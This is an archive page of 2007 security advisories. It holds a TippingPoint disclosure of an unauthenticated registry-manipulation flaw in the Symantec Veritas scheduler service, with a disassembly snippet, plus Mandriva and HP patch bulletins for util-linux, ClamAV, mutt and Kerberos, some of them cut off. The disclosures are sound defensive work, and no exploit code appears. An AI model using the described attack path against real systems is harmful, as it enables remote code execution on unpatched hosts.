vulnerable installations of Symantec Veritas Storage Foundation.
Authentication is not required to exploit this vulnerability.

The specific flaw exists in the functionality exposed by the Storage
Foundation for Windows Scheduler Service, VxSchedService.exe, which
listens by default on TCP port 4888. During normal use an administrator
may add schedules to be run using the management console which requires
authentication. However, if an attacker connects directly to the
scheduler service and issues the commands, there exists no validation
of credentials.

The packet is parsed for requests as shown in the following snippet:

.text:01016720 mov eax, [ebp-80h] ; controlled buffer
.text:01016723 dec eax ;
.text:01016724 mov byte ptr [ebp-4], 1
.text:01016728 jz create_registry
.text:0101672E dec eax
.text:0101672F jz short delete_registry
.text:01016731 dec eax
.text:01016732 dec eax
.text:01016733 jz short modify_registry

A malicious attacker is able to add, modify, or delete registry values
from
HKEY_LOCAL_MACHINE\Software\Veritas\VxSvc\CurrentVersion\Schedules
which holds the schedules for snapshots. Each schedule has a PreScript
and PostScript field which allow for arbitrary commands to be executed
when the schedule is run. Modification or either of these fields will
allow for remote code execution.

-- Vendor Response:
http://seer.entsupport.symantec.com/docs/288627.htm

-- Disclosure Timeline:
2007.02.08 - Vulnerability reported to vendor
2007.06.04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Aaron Portnoy, TippingPoint DVLabs

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


[ MDKSA-2007:111 ] - Updated util-linux packages address login access policies bypassing issue

2007-06-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:111
 http://www.mandriva.com/security/
 ___
 
 Package : util-linux
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 login in util-linux-2.12a (and later versions) skips pam_acct_mgmt
 and chauth_tok when authentication is skipped, such as when a
 Kerberos krlogin session has been established, which might allow
 users to bypass intended access policies that would be enforced by
 pam_acct_mgmt and chauth_tok.
 
 Updated packages have been patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7108
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 c6ccfda3e51f799be58d347a6252fc0d  
2007.0/i586/losetup-2.12r-8.2mdv2007.0.i586.rpm
 00677b03b96e27a2e04b1614cd717821  2007.0/i586/mount-2.12r-8.2mdv2007.0.i586.rpm
 be40a7e5880fc2f2734aced382b973bf  
2007.0/i586/util-linux-2.12r-8.2mdv2007.0.i586.rpm 
 a191a26c8a8bf8e09f9c2ed0f1355f45  
2007.0/SRPMS/util-linux-2.12r-8.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 3af6dbd097cd5f76876aaab20d0a460c  
2007.0/x86_64/losetup-2.12r-8.2mdv2007.0.x86_64.rpm
 944ba5000fbe19ff0aec7f7cb5e95f3b  
2007.0/x86_64/mount-2.12r-8.2mdv2007.0.x86_64.rpm
 8a9f34e7452785cb1b99428f4aa3e1c6  
2007.0/x86_64/util-linux-2.12r-8.2mdv2007.0.x86_64.rpm 
 a191a26c8a8bf8e09f9c2ed0f1355f45  
2007.0/SRPMS/util-linux-2.12r-8.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 dac84f6fd34e6390bf8895f499ea14c9  
2007.1/i586/losetup-2.12r-12.1mdv2007.1.i586.rpm
 6d8c238a5c8ab87221946cd2eea65b7e  
2007.1/i586/mount-2.12r-12.1mdv2007.1.i586.rpm
 c590331e6d863b2da097a0ce84dc1e6e  
2007.1/i586/util-linux-2.12r-12.1mdv2007.1.i586.rpm 
 ed6995fcf07fe3e8a45c7cf168ef4b9e  
2007.1/SRPMS/util-linux-2.12r-12.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 a5164c59195655944cfa8a0b091954e5  
2007.1/x86_64/losetup-2.12r-12.1mdv2007.1.x86_64.rpm
 3b45cf9ba0a237f8102fe5b18fb287ea  
2007.1/x86_64/mount-2.12r-12.1mdv2007.1.x86_64.rpm
 c7643e7ccd4d6d6db7a8ec5a64c0abc3  
2007.1/x86_64/util-linux-2.12r-12.1mdv2007.1.x86_64.rpm 
 ed6995fcf07fe3e8a45c7cf168ef4b9e  
2007.1/SRPMS/util-linux-2.12r-12.1mdv2007.1.src.rpm

 Corporate 3.0:
 aeea368d87973112f486157eb8e7a392  
corporate/3.0/i586/losetup-2.12-2.2.C30mdk.i586.rpm
 5368318cb1d78cfe55ab380fbb892e35  
corporate/3.0/i586/mount-2.12-2.2.C30mdk.i586.rpm
 9823ba9ec1c0aa6cdcd8400adfae4067  
corporate/3.0/i586/util-linux-2.12-2.2.C30mdk.i586.rpm 
 61dce5786fb8fcf8d47866a2f5ccac73  
corporate/3.0/SRPMS/util-linux-2.12-2.2.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 303222d2782ec741d3eec97393d24934  
corporate/3.0/x86_64/losetup-2.12-2.2.C30mdk.x86_64.rpm
 92952fcf2df3456c4c45378cd5c9d35d  
corporate/3.0/x86_64/mount-2.12-2.2.C30mdk.x86_64.rpm
 394783ba574f715de60eb916656d08bf  
corporate/3.0/x86_64/util-linux-2.12-2.2.C30mdk.x86_64.rpm 
 61dce5786fb8fcf8d47866a2f5ccac73  
corporate/3.0/SRPMS/util-linux-2.12-2.2.C30mdk.src.rpm

 Corporate 4.0:
 ef4ae1050f3db1223833665beaabc8b0  
corporate/4.0/i586/losetup-2.12q-7.2.20060mlcs4.i586.rpm
 a8d6eab630efed0f6fc762f187868698  
corporate/4.0/i586/mount-2.12q-7.2.20060mlcs4.i586.rpm
 a8fc8381718430bd75de652b11f39ae1  
corporate/4.0/i586/util-linux-2.12q-7.2.20060mlcs4.i586.rpm 
 8f216edaf80c4320b27b0e4e4f93b78a  
corporate/4.0/SRPMS/util-linux-2.12q-7.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 3aeec0f637c8e7ed452af857320c4eda  
corporate/4.0/x86_64/losetup-2.12q-7.2.20060mlcs4.x86_64.rpm
 17dddbe7a339f5d0f97fc555fe945016  
corporate/4.0/x86_64/mount-2.12q-7.2.20060mlcs4.x86_64.rpm
 44fb996e88d86b74403e6a79f3a247fb  
corporate/4.0/x86_64/util-linux-2.12q-7.2.20060mlcs4.x86_64.rpm 
 8f216edaf80c4320b27b0e4e4f93b78a  
corporate/4.0/SRPMS/util-linux-2.12q-7.2.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 6c6ee8df170f2045a0be93cf8941280b  mnf/2.0/i586/losetup-2.12-2.2.M20mdk.i586.rpm
 cf8a60bb88115e6f4d3076b5a1df50e5  mnf/2.0/i586/mount-2.12-2.2.M20mdk.i586.rpm
 298e9d5915b752d32c8824c986ba8276  
mnf/2.0/i586/util-linux-2.12-2.2.M20mdk.i586.rpm 
 d81106fb4614aab0ce85aac38b5c8231  
mnf/2.0/SRPMS/util-linux-2.12-2.2.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98


[security bulletin] HPSBUX02217 SSRT071337 rev.2 - HP-UX running Kerberos, Remote Arbitrary Code Execution

2007-06-05 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01056923
Version: 2

HPSBUX02217 SSRT071337 rev.2 - HP-UX running Kerberos, Remote Arbitrary Code 
Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-05-15
Last Updated: 2007-05-25

Potential Security Impact: Remote arbitrary code execution

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified on HP-UX running 
Kerberos. The vulnerability could be exploited by remote authorized users to 
execute arbitrary code.

References: CVE-2007-1216

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running the Kerberos Client software 
versions 1.3.5.05 and previous.

BACKGROUND

To determine if a system has an affected version, search the output of "swlist 
-a revision -l fileset" for an affected fileset. Then determine if the 
recommended patch or update is installed. 

AFFECTED VERSIONS 

HP-UX B.11.11 
= 
krb5client.KRB5-64SLIB-A 
krb5client.KRB5-E-A-MAN-A 
krb5client.KRB5-J-E-MAN-A 
krb5client.KRB5-J-S-MAN-A 
krb5client.KRB5-PRG-A 
krb5client.KRB5-RUN-A 
krb5client.KRB5-SHLIB-A 
action: install revision C.1.3.5.06 or subsequent 

KRB5-Client.KRB5-SHLIB 
KRB5-Client.KRB5-PRG 
KRB5-Client.KRB5-RUN 
KRB5-Client.KRB5-ENG-A-MAN 
KRB5-Client.KRB5-JPN-E-MAN 
KRB5-Client.KRB5-JPN-S-MAN 
KRB5-Client.KRB5-64SLIB 
action: install PHSS_36286 or subsequent 

HP-UX B.11.23 
= 
krb5client.KRB5-64SLIB-A 
krb5client.KRB5-E-A-MAN-A 
krb5client.KRB5-J-E-MAN-A 
krb5client.KRB5-J-S-MAN-A 
krb5client.KRB5-PRG-A 
krb5client.KRB5-RUN-A 
krb5client.KRB5-SHLIB-A 
krb5client.KRB5IA32SLIB-A 
krb5client.KRB5IA64SLIB-A 
action: install revision D.1.3.5.06 or subsequent 

KRB5-Client.KRB5-64SLIB 
KRB5-Client.KRB5-ENG-A-MAN 
KRB5-Client.KRB5-IA32SLIB 
KRB5-Client.KRB5-IA64SLIB 
KRB5-Client.KRB5-JPN-E-MAN 
KRB5-Client.KRB5-JPN-S-MAN 
KRB5-Client.KRB5-PRG 
KRB5-Client.KRB5-RUN 
KRB5-Client.KRB5-SHLIB 
action: install PHSS_34991 or subsequent 

HP-UX B.11.31 
= 
KRB5-Client.KRB5-64SLIB 
KRB5-Client.KRB5-IA32SLIB 
KRB5-Client.KRB5-IA64SLIB 
KRB5-Client.KRB5-SHLIB 
KRB5-Client.KRB5-64SLIB 
KRB5-Client.KRB5-SHLIB 
action: install PHSS_36361 or subsequent 

END AFFECTED VERSIONS 

RESOLUTION

HP has made the following patches and software updates available to resolve the 
vulnerability: 

B.11.11 PHSS_36286 or Kerberos Client C.1.3.5.06 or subsequent 
B.11.23 PHSS_34991 or Kerberos Client D.1.3.5.06 or subsequent 
B.11.31 PHSS_36361 or subsequent 

These software updates are available on: http://www.hp.com/go/softwaredepot/ 
The patches are available on: http://itrc.hp.com 

MANUAL ACTIONS: Yes - Update 

PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security 
Bulletins and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa 

HISTORY 
Version: 1 (rev.1) - 21 May 2007 Initial release 
Version: 2 (rev.2) - 29 May 2007 Corrected typo in Reference 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 


Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 

[ MDKSA-2007:115 ] - Updated clamav packages fix vulnerabilities

2007-06-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:115
 http://www.mandriva.com/security/
 ___
 
 Package : clamav
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A vulnerability in the OLE2 parser in ClamAV was found that could
 allow a remote attacker to cause a denial of service via resource
 consumption with a carefully crafted OLE2 file.
 
 Other vulnerabilities and bugs have also been corrected in 0.90.3
 which is being provided with this update.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2650
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 8f807a16b18ddd17fdcbbf563f0b225c  
2007.0/i586/clamav-0.90.3-0.1mdv2007.0.i586.rpm
 afcb2de5f26cc1fc07499cea6e5f4ffd  
2007.0/i586/clamav-db-0.90.3-0.1mdv2007.0.i586.rpm
 3ea7af875ea79a1efb2aec03e4e70e7e  
2007.0/i586/clamav-milter-0.90.3-0.1mdv2007.0.i586.rpm
 498a8e05cb31451382562c22dd8c6ca8  
2007.0/i586/clamd-0.90.3-0.1mdv2007.0.i586.rpm
 90cecf4adbf717672b54e5a18250447d  
2007.0/i586/clamdmon-0.90.3-0.1mdv2007.0.i586.rpm
 4c2b036b761d67aef27349f3bf6de11d  
2007.0/i586/libclamav2-0.90.3-0.1mdv2007.0.i586.rpm
 667c354d70642e8663edd469506fb488  
2007.0/i586/libclamav2-devel-0.90.3-0.1mdv2007.0.i586.rpm 
 e472e368da522072b20a7773f4db5d22  
2007.0/SRPMS/clamav-0.90.3-0.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 15636a6d8f3fd6537350b0a1b67741c3  
2007.0/x86_64/clamav-0.90.3-0.1mdv2007.0.x86_64.rpm
 097ede19d694a7f2d8d103bd16f9864b  
2007.0/x86_64/clamav-db-0.90.3-0.1mdv2007.0.x86_64.rpm
 68ebe1e39a0b25211e6c9dbeddcdefa6  
2007.0/x86_64/clamav-milter-0.90.3-0.1mdv2007.0.x86_64.rpm
 f0bd264bfdadc816759a438308b82cd7  
2007.0/x86_64/clamd-0.90.3-0.1mdv2007.0.x86_64.rpm
 30b6eb173aa40c39b6cd191433387a26  
2007.0/x86_64/clamdmon-0.90.3-0.1mdv2007.0.x86_64.rpm
 5164562d6affcacc64ade14d3acd23cd  
2007.0/x86_64/lib64clamav2-0.90.3-0.1mdv2007.0.x86_64.rpm
 b86a1162638401a101a08b52689df150  
2007.0/x86_64/lib64clamav2-devel-0.90.3-0.1mdv2007.0.x86_64.rpm 
 e472e368da522072b20a7773f4db5d22  
2007.0/SRPMS/clamav-0.90.3-0.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 378ad782e37e018e1e553d7c351ea358  
2007.1/i586/clamav-0.90.3-0.1mdv2007.1.i586.rpm
 d083214002090ae15d36c9463c78c29c  
2007.1/i586/clamav-db-0.90.3-0.1mdv2007.1.i586.rpm
 5316d47473a5c284f40fdb21c08b9d28  
2007.1/i586/clamav-milter-0.90.3-0.1mdv2007.1.i586.rpm
 ff430af11f2ba37bbcb521f93d71030a  
2007.1/i586/clamd-0.90.3-0.1mdv2007.1.i586.rpm
 ab9cac6d55dc192b5ffcaa5f356f6821  
2007.1/i586/clamdmon-0.90.3-0.1mdv2007.1.i586.rpm
 06daf5c409b7931ca02e88f85048225a  
2007.1/i586/libclamav2-0.90.3-0.1mdv2007.1.i586.rpm
 eb59ec3314ae85a0a2c400d725c1d984  
2007.1/i586/libclamav2-devel-0.90.3-0.1mdv2007.1.i586.rpm 
 22132cc15d14520edd635019d06b874e  
2007.1/SRPMS/clamav-0.90.3-0.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 03d79b409aa5c87570222a600ac92915  
2007.1/x86_64/clamav-0.90.3-0.1mdv2007.1.x86_64.rpm
 7cb3f180fa1bfc6cdaae4a7ae4088dc2  
2007.1/x86_64/clamav-db-0.90.3-0.1mdv2007.1.x86_64.rpm
 850deaafd4bb64b4c6a35772fffbd369  
2007.1/x86_64/clamav-milter-0.90.3-0.1mdv2007.1.x86_64.rpm
 9f3e3f88497ce3b769f5f6f7e05fd8ca  
2007.1/x86_64/clamd-0.90.3-0.1mdv2007.1.x86_64.rpm
 6f38934bee43286ecf2b8f7049c6dd1f  
2007.1/x86_64/clamdmon-0.90.3-0.1mdv2007.1.x86_64.rpm
 94f315377e8f33b936fff253eaa4e847  
2007.1/x86_64/lib64clamav2-0.90.3-0.1mdv2007.1.x86_64.rpm
 c7c1458f005b09c23bb2affb7b9aae0c  
2007.1/x86_64/lib64clamav2-devel-0.90.3-0.1mdv2007.1.x86_64.rpm 
 22132cc15d14520edd635019d06b874e  
2007.1/SRPMS/clamav-0.90.3-0.1mdv2007.1.src.rpm

 Corporate 3.0:
 d173ea9451a336aa56e834f1cd3d4882  
corporate/3.0/i586/clamav-0.90.3-0.1.C30mdk.i586.rpm
 2694fbbd622a5b312a523bc16993ff1c  
corporate/3.0/i586/clamav-db-0.90.3-0.1.C30mdk.i586.rpm
 647afdc7fcec85cc9190e2680b35000c  
corporate/3.0/i586/clamav-milter-0.90.3-0.1.C30mdk.i586.rpm
 2646c5e3f81c8d0b35229205bbba5344  
corporate/3.0/i586/clamd-0.90.3-0.1.C30mdk.i586.rpm
 bfd73b522c6d7cda7e7dd995a6e7e79b  
corporate/3.0/i586/clamdmon-0.90.3-0.1.C30mdk.i586.rpm
 aeca41b4f44f1f7ccbee306816f34259  
corporate/3.0/i586/libclamav2-0.90.3-0.1.C30mdk.i586.rpm
 78e8398b8f4b8663b0a0684acd6bd938  
corporate/3.0/i586/libclamav2-devel-0.90.3-0.1.C30mdk.i586.rpm 
 3bdca91be114543785b82ff8da904c16  
corporate/3.0/SRPMS/clamav-0.90.3-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 9d3ee2af6dbb5595bdbb1db33344bda5  
corporate/3.0/x86_64/clamav-0.90.3-0.1.C30mdk.x86_64.rpm
 22b70bcf86a90f84702f722a5eb5dbf1  
corporate/3.0/x86_64/clamav-db-0.90.3-0.1.C30mdk.x86_64.rpm
 6b9e3874400f14173

[ MDKSA-2007:113 ] - Updated mutt packages fix vulnerabilities

2007-06-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:113
 http://www.mandriva.com/security/
 ___
 
 Package : mutt
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0
 ___
 
 Problem Description:
 
 A flaw in the way mutt processed certain APOP authentication requests
 was discovered.  By sending certain responses when mutt attempted to
 authenticate again an APOP server, a remote attacker could possibly
 obtain certain portions of the user's authentication credentials
 (CVE-2007-1558).
 
 A flaw in how mutt handled certain characters in gecos fields could
 lead to a buffer overflow.  A local user able to give themselves a
 carefully crafted Real Name could potentially execute arbitrary code
 if a victim used mutt to expand the attacker's alias (CVE-2007-2683).
 
 Updated packages have been patched to address these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1558
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2683
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 b43721e2b31820fd9f5812d5d2ea7709  2007.0/i586/mutt-1.5.11-5.2mdv2007.0.i586.rpm
 0a2ecfcd4950075f788a68c16e6a513d  
2007.0/i586/mutt-utf8-1.5.11-5.2mdv2007.0.i586.rpm 
 cb6ce601ab9f3542afcacb09614a4ebd  2007.0/SRPMS/mutt-1.5.11-5.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 3c26410f2cbed87435c86122095994e0  
2007.0/x86_64/mutt-1.5.11-5.2mdv2007.0.x86_64.rpm
 c8a815d5f8de4cf548084bbcb0cc4957  
2007.0/x86_64/mutt-utf8-1.5.11-5.2mdv2007.0.x86_64.rpm 
 cb6ce601ab9f3542afcacb09614a4ebd  2007.0/SRPMS/mutt-1.5.11-5.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 9c4ced2eba202a4f2670d6986ba12d4a  2007.1/i586/mutt-1.5.14-1.1mdv2007.1.i586.rpm
 f6db8984bf23a3dfb38ac0aa50fc521f  
2007.1/i586/mutt-utf8-1.5.14-1.1mdv2007.1.i586.rpm 
 4d192718f3b9b508492f6e686e96c27b  2007.1/SRPMS/mutt-1.5.14-1.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 55ddf6e16f45e7d206279c207c51725a  
2007.1/x86_64/mutt-1.5.14-1.1mdv2007.1.x86_64.rpm
 980c4db7c94c05cf53329b085b0d44d8  
2007.1/x86_64/mutt-utf8-1.5.14-1.1mdv2007.1.x86_64.rpm 
 4d192718f3b9b508492f6e686e96c27b  2007.1/SRPMS/mutt-1.5.14-1.1mdv2007.1.src.rpm

 Corporate 3.0:
 04fc719b9625069d10f3d8fc8234d0e2  
corporate/3.0/i586/mutt-1.5.5.1i-2.3.C30mdk.i586.rpm
 e8edc6bc6d2726c87841c26140293f3a  
corporate/3.0/i586/mutt-utf8-1.5.5.1i-2.3.C30mdk.i586.rpm 
 a7a4c85f414451f966598bf5ac39e86f  
corporate/3.0/SRPMS/mutt-1.5.5.1i-2.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 07e8da602972a500108a15dc6e751ebd  
corporate/3.0/x86_64/mutt-1.5.5.1i-2.3.C30mdk.x86_64.rpm
 3f7729407df0c9037c5514c3f9b746fe  
corporate/3.0/x86_64/mutt-utf8-1.5.5.1i-2.3.C30mdk.x86_64.rpm 
 a7a4c85f414451f966598bf5ac39e86f  
corporate/3.0/SRPMS/mutt-1.5.5.1i-2.3.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGZGyEmqjQ0CJFipgRAmbzAJ9yRBNSbbCia14nCDN9bV46xKuB0ACgntnI
twlTs6PCF7+DZjIxwiHF+Yw=
=hwYt
-END PGP SIGNATURE-